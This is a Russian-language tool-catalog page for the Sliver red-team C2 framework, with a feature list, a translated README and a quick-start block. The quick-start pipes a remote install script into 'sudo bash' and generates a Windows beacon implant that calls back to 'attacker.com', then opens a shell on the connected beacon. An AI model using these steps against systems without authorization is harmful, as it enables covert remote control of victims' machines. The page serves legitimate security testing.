Sliver

Exploitation v1.7.3 · 24.02.2026 активный

Современный open source C2-фреймворк от BishopFox. Альтернатива Cobalt Strike и Metasploit для red team операций. Поддерживает несколько транспортных протоколов и генерацию имплантов. Возможности: - Импланты под Windows, Linux, macOS (Go-based, кросс-компиляция) - Транспорты: mTLS, WireGuard, HTTP/S, DNS - Генерация стейджеров, shellcode, DLL - Мультипользовательский режим: командная работа операторов - BOF (Beacon Object Files) поддержка - Интеграция с Armory: каталог сторонних расширений - OPSEC-фичи: sleep, jitter, process injection

v1.7.3
24.02.2026 current
Добавлен 19.06.2026 · Обновлён 19.06.2026 · Exploitation
Установка
# Скачать бинарь сервера:
# https://github.com/BishopFox/sliver/releases

# Linux (быстрый старт):
curl https://sliver.sh/install | sudo bash

# Запустить сервер:
sudo sliver-server

# В консоли Sliver:
# Создать имплант (beacon):
generate beacon --mtls attacker.com --os windows --arch amd64

# Запустить listener:
mtls

# Ждать подключения:
beacons
use <beacon-id>
ls / whoami / shell
переведено ИИ

Sliver

Sliver — это открытый кроссплатформенный фреймворк для эмуляции противника/команды Red Team, который могут использовать организации любого размера для проведения тестирования на безопасность. Импланты Sliver поддерживают C2-каналы через mTLS, WireGuard, HTTP(S) и DNS и компилируются динамически с использованием асимметричных ключей шифрования для каждого бинарного файла.

Сервер и клиент поддерживают MacOS, Windows и Linux. Импланты поддерживаются в MacOS, Windows и Linux (и, возможно, во всех целевых платформах компилятора Golang, но мы не все их тестировали).

Release Go Report Card License: GPL v3

Посетите https://sliver.sh/, чтобы получить доступ к учебным пособиям и документации.

Возможности

  • Динамическая генерация кода
  • Обфускация во время компиляции
  • Многопользовательский режим
  • Пэйлоады с этапом загрузки (staged) и без этапа загрузки (stageless)
  • Процедурно генерируемый C2 через HTTP(S)
  • DNS-канарейка для обнаружения синей командой
  • Безопасный C2 через mTLS, WireGuard, HTTP(S) и DNS
  • Полностью скриптуемый с использованием Python
  • Миграция процессов в Windows, инъекция в процесс, манипуляция токенами пользователя и многое другое
  • Интеграция с Let's Encrypt
  • Выполнение сборок .NET в памяти
  • Загрузчик COFF/BOF в памяти
  • TCP- и именованные каналы для пивотинга
  • И многое другое!

Начало работы

Скачайте последний релиз и обратитесь к вики Sliver для краткого руководства по базовой настройке и использованию. Чтобы получить самую последнюю версию, соберите из исходного кода.

Однострочная команда для Linux

curl https://sliver.sh/install|sudo bash, а затем запустите sliver

Помощь!

Пожалуйста, ознакомьтесь с вики или начните обсуждение в GitHub.

Сборка из исходного кода

См. вики.

Лицензия — GPLv3

Sliver лицензирован под лицензией GPLv3, некоторые подкомпоненты могут иметь отдельные лицензии. Подробности см. в соответствующих подкаталогах этого проекта.

Комментарии
Войдите, чтобы оставить комментарий